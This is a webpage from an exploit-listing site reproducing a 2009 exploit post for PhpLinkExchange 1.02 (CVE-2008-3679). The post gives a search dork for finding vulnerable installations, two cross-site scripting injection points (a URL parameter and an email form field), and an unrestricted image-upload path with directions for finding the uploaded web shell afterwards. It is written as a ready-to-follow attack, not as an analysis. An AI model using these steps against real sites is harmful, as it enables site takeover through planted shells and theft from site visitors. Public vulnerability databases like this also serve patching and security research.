[] NeoSense
E X P L O I T S
title author type platform port cve id

PhpLinkExchange 1.02 - Cross-Site Scripting / Upload

Author: Stink'
type: webapps
platform: php
port: 
date_added: 2009-12-15 
date_updated:  
verified: 1 
codes: CVE-2008-3679;OSVDB-47450 
tags: 
aliases:  
screenshot_url:  
application_url: 
#############################
PhpLinkExchange v1.02 - XSS/Upload Vulerability
Discovered by : Stink'
Date : 2009-12-16
Dork : "PhpLinkExchange v1.02"
Website Publisher : http://www.idevspot.com/PhpLinkExchange.php
#############################

-- [XSS in URL] --
http://server/links/PhpLinkExchange/index.php?page=home&catid=[XSS]

-- [XSS in form] --
http://server/links/PhpLinkExchange/index.php?page=tellafriend
The XSS is in "Your Email Adress"

-- [Upload Vulnerability] --
http://server/links/library/add_images.php
After your shell uploaded, go here :
http://server/links/appimage/ and search your shell :)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.